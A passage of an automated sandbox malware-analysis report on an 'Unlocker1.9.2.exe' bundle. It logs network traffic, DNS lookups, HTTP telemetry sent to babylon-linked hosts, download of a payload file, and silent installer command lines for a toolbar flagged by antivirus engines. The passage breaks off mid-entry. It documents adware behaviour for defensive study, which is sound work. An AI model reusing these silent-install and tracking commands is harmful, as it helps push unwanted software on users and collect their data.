                                                                                                                                                            Feb 17, 2023 13:07:00.272099018 CET8049696184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.272156000 CET8049696184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.272258997 CET4969680192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.272306919 CET4969680192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.331614971 CET4969780192.168.2.4198.143.175.67
                                                                                                                                                            Feb 17, 2023 13:07:00.486284018 CET8049697198.143.175.67192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.486479044 CET4969780192.168.2.4198.143.175.67
                                                                                                                                                            Feb 17, 2023 13:07:00.490586996 CET4969780192.168.2.4198.143.175.67
                                                                                                                                                            Feb 17, 2023 13:07:00.645337105 CET8049697198.143.175.67192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.645375013 CET8049697198.143.175.67192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.645400047 CET8049697198.143.175.67192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.645420074 CET8049697198.143.175.67192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.645437002 CET8049697198.143.175.67192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.645474911 CET4969780192.168.2.4198.143.175.67
                                                                                                                                                            Feb 17, 2023 13:07:00.645533085 CET4969780192.168.2.4198.143.175.67
                                                                                                                                                            Feb 17, 2023 13:07:01.157633066 CET8049695184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:01.157717943 CET4969580192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:01.271697998 CET8049696184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:01.271764994 CET4969680192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.160208941 CET4969580192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.160280943 CET4969580192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.162254095 CET4969880192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.280493975 CET8049698184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:02.282772064 CET4969880192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.283214092 CET4969880192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.401191950 CET8049698184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:02.402560949 CET8049698184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:02.402582884 CET8049698184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:02.402709007 CET4969880192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.402709007 CET4969880192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.652609110 CET4969880192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:02.652609110 CET4969880192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:05.565376997 CET4969680192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:05.565417051 CET4969780192.168.2.4198.143.175.67

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Feb 17, 2023 13:06:59.874687910 CET5657253192.168.2.48.8.8.8
                                                                                                                                                            Feb 17, 2023 13:06:59.901247025 CET53565728.8.8.8192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:06:59.995367050 CET5091153192.168.2.48.8.8.8
                                                                                                                                                            Feb 17, 2023 13:07:00.024701118 CET53509118.8.8.8192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.306576967 CET5968353192.168.2.48.8.8.8
                                                                                                                                                            Feb 17, 2023 13:07:00.328727961 CET53596838.8.8.8192.168.2.4

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Feb 17, 2023 13:06:59.874687910 CET192.168.2.48.8.8.80x2e37Standard query (0)stat.info-stream.netA (IP address)IN (0x0001)false
                                                                                                                                                            Feb 17, 2023 13:06:59.995367050 CET192.168.2.48.8.8.80x254fStandard query (0)stp.babylon.comA (IP address)IN (0x0001)false
                                                                                                                                                            Feb 17, 2023 13:07:00.306576967 CET192.168.2.48.8.8.80xa6c1Standard query (0)dl.babylon.comA (IP address)IN (0x0001)false

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Feb 17, 2023 13:06:59.901247025 CET8.8.8.8192.168.2.40x2e37No error (0)stat.info-stream.netstat.babylon-services.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Feb 17, 2023 13:06:59.901247025 CET8.8.8.8192.168.2.40x2e37No error (0)stat.babylon-services.com184.154.27.232A (IP address)IN (0x0001)false
                                                                                                                                                            Feb 17, 2023 13:07:00.024701118 CET8.8.8.8192.168.2.40x254fNo error (0)stp.babylon.comstp.babylon-services.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Feb 17, 2023 13:07:00.024701118 CET8.8.8.8192.168.2.40x254fNo error (0)stp.babylon-services.com184.154.27.232A (IP address)IN (0x0001)false
                                                                                                                                                            Feb 17, 2023 13:07:00.328727961 CET8.8.8.8192.168.2.40xa6c1No error (0)dl.babylon.comdl.babylon-services.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Feb 17, 2023 13:07:00.328727961 CET8.8.8.8192.168.2.40xa6c1No error (0)dl.babylon-services.com198.143.175.67A (IP address)IN (0x0001)false

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • stat.info-stream.net
                                                                                                                                                            • stp.babylon.com
                                                                                                                                                            • dl.babylon.com

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.449695184.154.27.23280C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Feb 17, 2023 13:07:00.039767027 CET91OUTGET /report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0 HTTP/1.1
                                                                                                                                                            User-Agent: Babylon
                                                                                                                                                            Host: stat.info-stream.net
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Feb 17, 2023 13:07:00.159986973 CET92INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 17 Feb 2023 12:07:00 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                            Data Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                                                                                                                            Data Ascii: 2bGIF89a!,D;
                                                                                                                                                            Feb 17, 2023 13:07:00.160046101 CET93INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.449696184.154.27.23280C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Feb 17, 2023 13:07:00.152195930 CET92OUTGET /downloader.php?ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&lang=en&zpb=1&geo=1 HTTP/1.1
                                                                                                                                                            User-Agent: Babylon
                                                                                                                                                            Host: stp.babylon.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Cookie: affilID=122471
                                                                                                                                                            Feb 17, 2023 13:07:00.272099018 CET93INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 17 Feb 2023 15:09:02 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Set-Cookie: affilID=deleted; expires=Thu, 17-Feb-2022 15:09:01 GMT; path=/; domain=.babylon.com
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Keep-Alive: timeout=1, max=100
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 31 31 32 0d 0a 21 2d 74 72 6b 49 6e 66 6f 3d 5b 54 54 79 70 65 3a 35 30 31 32 5f 37 5d 3b 23 44 51 30 42 57 51 46 64 34 6e 47 4e 69 59 47 5a 69 59 47 45 46 59 6a 59 67 4e 67 46 69 46 69 59 47 5a 6b 59 48 5a 26 33 69 6b 68 51 33 74 77 6a 50 76 4f 4b 53 48 41 58 39 6e 4c 78 30 32 32 67 66 52 7a 26 33 57 41 58 39 78 4c 53 63 45 74 75 6b 78 4b 54 69 34 68 49 46 26 64 4b 38 54 4b 43 4b 78 4a 77 63 78 35 77 63 42 67 45 77 69 4a 32 72 75 78 4d 41 30 50 63 56 4c 51 3b 23 44 51 79 45 67 65 4a 78 6a 59 6d 42 6d 59 6d 42 68 42 57 49 32 49 44 59 43 59 69 35 47 56 73 59 47 41 52 42 34 31 76 5a 38 49 67 41 57 35 51 51 67 3b 24 68 74 74 70 3a 2f 2f 64 6c 2e 62 61 62 79 6c 6f 6e 2e 63 6f 6d 2f 73 69 74 65 2f 66 69 6c 65 73 2f 53 65 74 75 70 39 2f 64 77 72 2f 6c 61 74 65 73 74 2f 6c 61 74 65 73 74 5f 62 6c 2f 53 65 74 75 70 32 2e 7a 70 62 3b 0d 0a
                                                                                                                                                            Data Ascii: 112!-trkInfo=[TType:5012_7];#DQ0BWQFd4nGNiYGZiYGEFYjYgNgFiFiYGZkYHZ&3ikhQ3twjPvOKSHAX9nLx022gfRz&3WAX9xLScEtukxKTi4hIF&dK8TKCKxJwcx5wcBgEwiJ2ruxMA0PcVLQ;#DQyEgeJxjYmBmYmBhBWI2IDYCYi5GVsYGARB41vZ8IgAW5QQg;$http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb;
                                                                                                                                                            Feb 17, 2023 13:07:00.272156000 CET93INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.449697198.143.175.6780C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Feb 17, 2023 13:07:00.490586996 CET94OUTGET /site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb HTTP/1.1
                                                                                                                                                            User-Agent: Babylon
                                                                                                                                                            Host: dl.babylon.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Feb 17, 2023 13:07:00.645375013 CET95INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.13.4
                                                                                                                                                            Date: Fri, 17 Feb 2023 12:07:00 GMT
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Content-Length: 3844
                                                                                                                                                            Last-Modified: Wed, 01 Oct 2014 12:08:35 GMT
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Keep-Alive: timeout=15
                                                                                                                                                            ETag: "542beec3-f04"
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Data Raw: 91 78 12 11 03 00 00 00 01 5d 00 00 00 04 4c 22 00 00 00 00 00 00 00 00 80 3d bb 9b c1 4f c3 f3 d8 6b eb 99 b2 83 23 80 b4 0c 2d 58 69 3b 17 29 aa 73 5f b3 21 11 45 70 37 dc 51 50 92 10 3a 2c 44 82 14 5a e9 7a 4b 19 8d 5e c0 32 d8 f5 40 0b 9f 77 e7 42 46 99 52 41 2d e5 45 85 28 75 dc 6f b4 7d d7 ff 5a 1b 88 4b 56 83 e1 55 f1 da 9b 72 8d fa 25 5a 9b 93 dc 90 97 79 ef 32 47 67 e8 d3 be 56 5e b0 ca f6 a3 5e 95 b8 48 9d c1 65 d4 f6 0e 41 be ca 89 8a bf c0 70 af db ba ef 3b 48 39 8d fe 51 27 61 55 33 ba 90 6d 2f 84 83 27 11 80 27 b7 42 79 94 e3 49 c2 f7 cf dc 99 a2 41 cb b1 7c 11 ca f9 3d de 68 c1 00 42 27 2d f7 f5 90 3e a4 9f a7 93 11 1e 0a a1 f7 28 05 c6 63 b5 e8 b3 9e 8a 35 b1 13 3f d8 85 04 db 7d 12 e6 a7 db 71 9f e5 53 f1 56 4e 8c 1d 4a 75 bb a9 cb 76 b0 8b 5a b0 88 86 07 f1 5d 8d da 66 fd a7 a8 5c 4f 5d 91 58 e7 15 06 c9 50 3b 2b 5e 0c 96 55 ce 33 ca 1f d2 74 38 46 8e 22 a3 0a 64 0c 5f dd f5 98 e3 fc 05 a5 e7 41 d9 d1 b3 5b 9a 54 59 0e cd 2c 87 4f a6 dd a4 08 00 ed 34 41 8a 96 7a bc 8b 8e 41 e4 5a cf e5 62 31 81 b1 58 72 a7 52 1a d3 21 7a 5c fc e5 bb 44 ec a1 bf c5 76 c6 be 29 f5 59 bd a0 4a 44 81 04 d4 cb 47 92 c7 75 5e bc 0c 25 b3 4e 3c b7 e0 5a 47 28 0c 14 5c 44 b2 ec 4a ce 26 91 ea de e8 4c 5b de d1 cf ec 06 20 f0 e4 b4 f2 85 90 2f fb df 84 61 e7 7a b3 20 7d fc 9f 61 fe e4 8d 72 73 29 6c 0b da 00 2d 5e 5e e2 c6 9d cd fd e7 e3 ff 1a da e2 10 7b 8f bd 6c 92 de 04 76 f1 ab 26 c2 c0 a8 35 07 29 11 1c 9f 46 3f 9f d1 52 17 79 53 16 74 92 fe f6 3d 7e 49 46 1d d9 21 ae 22 97 5b 60 a4 34 56 93 b9 a3 35 fa f2 a1 6b 49 5a 45 94 b5 f0 f7 71 4d 98 0a 23 b7 a9 81 31 04 f4 b2 71 57 05 7e b3 9d 9a df f8 3b f3 9e 4b 1d 05 cc a4 bd 77 c7 5e 1b ae 89 d4 7b c4 ee 73 db 25 c6 55 7c 0d c0 ed 82 d6 6e 73 98 2f 39 e1 d7 25 1d 88 78 3e 43 59 c4 85 a1 db 56 b9 6b 91 a1 0e 0f e4 39 79 ea 98 e8 b3 25 fb 78 8e 4b 41 5d e2 54 ba 54 cc e2 e7 b4 b8 d9 99 35 b8 3b b1 eb 7b 22 a3 42 9e db 4d 32 ff 8f f2 ea ad f9 33 98 8a c6 ac 32 b2 71 a4 fe 57 55 7d 03 8d ed a1 da 32 99 bc 7d 68 79 6f b7 35 f2 91 3c 33 f6 0d 8c b0 e6 34 41 61 f3 5b c7 cc 89 48 fb 60 ac 7d a5 04 8d 6f f0 8c af ca 95 8d 5a 75 c6 f1 aa 5b 27 a7 bb d3 6a 02 10 5c 42 7b a6 37 48 ae d5 5c fb 2a 75 ad e9 f3 f6 b2 33 28 cd c4 60 d0 b5 e0 62 db c8 0a 65 52 55 90 ce b2 2c cb 4b 3d 6e 4d 90 8c 64 78 84 68 9b d5 6f 17 24 a6 e3 05 54 56 c5 6b 31 d0 66 e1 85 a3 f7 33 c2 8b de f1 bd f2 9c 82 92 3f ce 74 bf ee fc a8 a2 71 81 09 c9 54 47 15 71 8d 87 61 db b8 70 fd 7f 0f 9f 1e a9 57 c3 e3 3f 0f 22 75 5d a4 40 4c b4 44 00 50 82 ef 6b 59 e0 05 8e b4 e9 5e 3c b0 09 60 d3 b2 c5 58 61 71 7e f1 11 52 f1 4e bf 9e 41 2a ae 7b 77 ec ad 93 3d f2 36 08 98 3c f6 b5 ab 58 6f 27 2e 68 63 9d 4f 6b 0c 95 c2 f9 1f fe 2a d5 21 7d e3 c6 35 86 cb 79 00 65 9d 5f 17 db c3 ef 29 61 4d 98 00 f1 63 f4 6a d6 26 4d ef 1e b6 3c 22 06 c9 4d 4c c6 2e 78 10 02 80 d2 ba 4f 94 90 99 a9 6d 1b 45 b5 3d a3 05 57 0c 78 78 9e 4a ee 53 2a 5b 4f 52 cc f6 56 b7 a1 82 9f a6 d9 13 7f 5c d8 ae e3 d4 33 ff 41 a0 43 4b a3 e1 a4 41 59 01 01 58 5a 13 63 9a 1e a4 6d ad d1 2b b5 62 d4 5e 0b af 5b
                                                                                                                                                            Data Ascii: x]L"=Ok#-Xi;)s_!Ep7QP:,DZzK^2@wBFRA-E(uo}ZKVUr%Zy2GgV^^HeAp;H9Q'aU3m/''ByIA|=hB'->(c5?}qSVNJuvZ]f\O]XP;+^U3t8F"d_A[TY,O4AzAZb1XrR!z\Dv)YJDGu^%N<ZG(\DJ&L[ /az }ars)l-^^{lv&5)F?RySt=~IF!"[`4V5kIZEqM#1qW~;Kw^{s%U|ns/9%x>CYVk9y%xKA]TT5;{"BM232qWU}2}hyo5<34Aa[H`}oZu['j\B{7H\*u3(`beRU,K=nMdxho$TVk1f3?tqTGqapW?"u]@LDPkY^<`Xaq~RNA*{w=6<Xo'.hcOk*!}5ye_)aMcj&M<"ML.xOmE=WxxJS*[ORV\3ACKAYXZcm+b^[
                                                                                                                                                            Feb 17, 2023 13:07:00.645400047 CET97INData Raw: 50 60 3b aa 41 8d 42 e3 51 fd 8a 3c 26 e3 8f 64 f9 fc c9 cb e1 26 f0 ad 66 d1 73 28 2b 46 f2 d8 e0 85 13 57 8a 3c 62 c4 af 6b 96 c0 20 24 25 03 80 59 e8 8f 0a c2 7a 29 5e 61 49 9c 5f a2 4e ab b5 97 ea 79 71 06 3d 35 94 9c c4 81 ac 53 a1 f7 2e 9a
                                                                                                                                                            Data Ascii: P`;ABQ<&d&fs(+FW<bk $%Yz)^aI_Nyq=5S.-zt?0n}>%0@Qq[Z~Sf4ik2FB1rDLjyU(+AMU8mIM~d/BN22!+r}r )IowwZ)
                                                                                                                                                            Feb 17, 2023 13:07:00.645420074 CET98INData Raw: 77 95 63 8e 58 b7 0e 45 31 19 16 68 fd 42 86 9d 1e 44 a0 ff 64 b1 9c c2 0f bf bf c9 cf 7e 2e ca e7 81 d8 84 11 d4 f2 fd 37 82 16 66 3f 30 68 77 96 65 43 4d 49 99 df 80 84 0a d6 44 19 ca 7b c8 70 28 d9 a2 a4 ad 5f 48 46 f7 a5 1a 40 fd 24 c9 5a ee
                                                                                                                                                            Data Ascii: wcXE1hBDd~.7f?0hweCMID{p(_HF@$Z#?("vuMU-A8l2JvfN~\:g)#[1 Ae~_366|dSpNh2rK?T,M?"j{sA!> /
                                                                                                                                                            Feb 17, 2023 13:07:00.645437002 CET98INData Raw: b9 18 3e 87 d0 e4 76 06 c0 bc 76 7b 91 ba 7e 00 f5 37 c0 a5 25 00 67 66 fe dc f5 69 18 aa 5a 5a 38 12 aa fb b7 7f a1 c1 e3 0a 05 24 04 63 16 a9 35 9f a0 70 71 af 5a e2 bf e0 3b 9a ba 79 6e 76 6a 75 d8 78 58 d5 37 38 51 22 27 27 c1 98 2f 15 a8 a7
                                                                                                                                                            Data Ascii: >vv{~7%gfiZZ8$c5pqZ;ynvjuxX78Q"''/(wTu$gBnp>Ea4Ad3`y]3"Hlc5lg45%Z0WF}30D#ck}bcRqZ},;\_w1fig!Z"|Y0d]2


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.449698184.154.27.23280C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Feb 17, 2023 13:07:02.283214092 CET100OUTGET /report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&hp=1&dsp=1&tb=1&hpx=0&dspx=0&rvrt=0&excd=0&stm=2&nvs=0&dnld=100&dcnt=1&dtot=1&dlerr=200&dltm=0&dlsz=3844&dsflr=0&errurl=Setup2.zpb&hpc=1998245871&spc=1998245871&tbx=0 HTTP/1.1
                                                                                                                                                            User-Agent: Babylon
                                                                                                                                                            Host: stat.info-stream.net
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Feb 17, 2023 13:07:02.402560949 CET100INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 17 Feb 2023 15:09:05 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                            Data Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                                                                                                                            Data Ascii: 2bGIF89a!,D;
                                                                                                                                                            Feb 17, 2023 13:07:02.402582884 CET100INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:13:06:34
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:1078591 bytes
                                                                                                                                                            MD5 hash:1E02D6AA4A199448719113AE3926AFB2
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:13:06:54
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
                                                                                                                                                            Imagebase:0x9a0000
                                                                                                                                                            File size:785904 bytes
                                                                                                                                                            MD5 hash:EB2764885565B6C01CB32E5F51F213B3
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 44%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:13:06:54
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:1898992 bytes
                                                                                                                                                            MD5 hash:26F6D1B6756A83DE9755A05F7C030D75
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 23%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:13:06:57
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com
                                                                                                                                                            Imagebase:0x1040000
                                                                                                                                                            File size:61952 bytes
                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:13:06:58
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\IELowutil.exe" -PID:123
                                                                                                                                                            Imagebase:0x1260000
                                                                                                                                                            File size:221184 bytes
                                                                                                                                                            MD5 hash:D1F5C3244A69511CAC88009B71884A71
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            General

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:13:06:58
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache trkInfo|http://babylon.com
                                                                                                                                                            Imagebase:0x1040000
                                                                                                                                                            File size:61952 bytes
                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:13:07:00
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Setup.exe -latest -trkInfo=[TType:5012_7] -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
                                                                                                                                                            Imagebase:0xee0000
                                                                                                                                                            File size:8704 bytes
                                                                                                                                                            MD5 hash:5790A04F78C61C3CAEA7DDD6F01829D2
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:13:07:00
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
